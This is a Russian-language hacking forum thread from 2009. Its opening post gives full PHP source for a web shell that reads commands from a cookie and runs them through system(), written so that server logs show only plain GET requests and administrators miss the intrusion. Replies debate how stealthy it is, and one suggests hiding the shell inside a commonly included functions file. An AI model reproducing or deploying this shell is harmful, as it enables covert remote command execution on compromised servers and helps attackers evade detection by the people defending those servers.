веб-шелл, работающий через $_COOKIE |
24.06.2009, 23:28
|
|
Участник форума
Регистрация: 07.06.2006
Сообщений: 146
С нами:
10487223
Репутация:
490
|
|
веб-шелл, работающий через $_COOKIE
В один момент я задумался о том что во время использования какого-либо веб-шелла в логах сохраняються последовательные POST запросы к одному и тому же файлу, что может кидатся в глаза при анализе логов администраторами.
Я подумал почему бы не заменить передачу через POST на COOKIES. Реализацию подобного мне не приходилось наблюдать.
Вот и набросал небольшой веб-шелл, который в логах оставляет GET записи. Для работы должно быть разрешено использование cookies и Javascript.
cookie-shell.php
PHP код:
<?php
@set_time_limit(0);
$cmd = $_COOKIE['cmd'] ? $_COOKIE['cmd']: 'ls -la';
?>
<html>
<head><title>Cookies web-shell PoC</title></head>
<body>
<script type="text/javascript">
function send(val)
{
document.cookie = "cmd="+val;
location.reload();
}
</script>
<form>
<input type="text" id="cmd" value="<?=$cmd?>"/>
<input type="submit" onclick="send(document.getElementById('cmd').value)" value="execute"/>
</form>
<pre>
<?php
ob_start();
system($cmd);
$res = ob_get_contents();
ob_end_clean();
echo htmlspecialchars($res);
?>
</pre>
</body>
</html>
После использования скрипта в логах останется примерно такое:
Код:
127.0.0.1 - - [24/Jun/2009:22:17:56 +0300] "GET /cookie-shell.php HTTP/1.1" 200 455 "http://localhost/cookie-shell.php" "Mozilla/5.0 (X11; U; Linux i686; uk; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11"
127.0.0.1 - - [24/Jun/2009:22:17:56 +0300] "GET /cookie-shell.php HTTP/1.1" 200 455 "-" "Mozilla/5.0 (X11; U; Linux i686; uk; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11"
127.0.0.1 - - [24/Jun/2009:22:17:58 +0300] "GET /cookie-shell.php HTTP/1.1" 200 289 "http://localhost/cookie-shell.php" "Mozilla/5.0 (X11; U; Linux i686; uk; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11"
127.0.0.1 - - [24/Jun/2009:22:17:58 +0300] "GET /cookie-shell.php HTTP/1.1" 200 289 "http://localhost/cookie-shell.php" "Mozilla/5.0 (X11; U; Linux i686; uk; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11"
Интересует Ваше мнение по практическому использованию даного метода. |
|
|
25.06.2009, 00:38
|
|
Познавший АНТИЧАТ
Регистрация: 01.05.2006
Сообщений: 1,021
С нами:
10541186
Репутация:
921
|
|
а последовательные гет записи к неизвестному файлу подозрения не вызовут?
|
|
|
|
25.06.2009, 00:53
|
|
Познавший АНТИЧАТ
Регистрация: 07.05.2006
Сообщений: 1,031
С нами:
10533245
Репутация:
773
|
|
Sharky +1
тоже подумал
|
|
|
|
25.06.2009, 01:17
|
|
Познающий
Регистрация: 10.02.2006
Сообщений: 88
С нами:
10656091
Репутация:
8
|
|
АррЪ! Забивать шелл в файл c functions или т.е =) и потом подгружать шелл уже с любой страницы которая инклудит этот файл  вЭлосипед ё-маё =) |
|
|
|
25.06.2009, 02:33
|
|
Познавший АНТИЧАТ
Регистрация: 07.05.2006
Сообщений: 1,031
С нами:
10533245
Репутация:
773
|
|
Расскажите в чем прикол
|
|
|
|
25.06.2009, 03:54
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
С нами:
9223466
Репутация:
3171
|
|
команды явой пишуться в кукисы,и к файлу никаких запросов с команлами не идет.выполнение команд из кукмсов
|
|
|
|
25.06.2009, 04:08
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами:
9642449
Репутация:
606
|
|
Даа, чо-то ты не туда завернул) Запросы то все равно идут...
|
|
|
|
25.06.2009, 04:21
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
С нами:
9223466
Репутация:
3171
|
|
Да,запросы идут,но никаких параметров через ГЕТ или ПОСт не передаеться,смотрите код.
|
|
|
|
25.06.2009, 04:52
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами:
9642449
Репутация:
606
|
|
ну дык Тот же Madshell какбе POSTами шлет(никаких параметров), да и другие тоже.
Топикстартер сам себе противоречит.
В один момент я задумался о том что во время использования какого-либо веб-шелла в логах сохраняються последовательные POST запросы к одному и тому же файлу, что может кидатся в глаза при анализе логов администраторами.
Его шелл точно также оставляет последовательные GET запросы к одному и тому же файлу.
Это просто попытка перепрыгнуть свою голову, имхо. |
|
|
|
25.06.2009, 05:02
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
С нами:
9223466
Репутация:
3171
|
|
Оствляет,только вот там не видно никаких: cmd=ls -la , согласись?
А кагбудто просто делали запросы к файлегу,может это был гугль?)
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
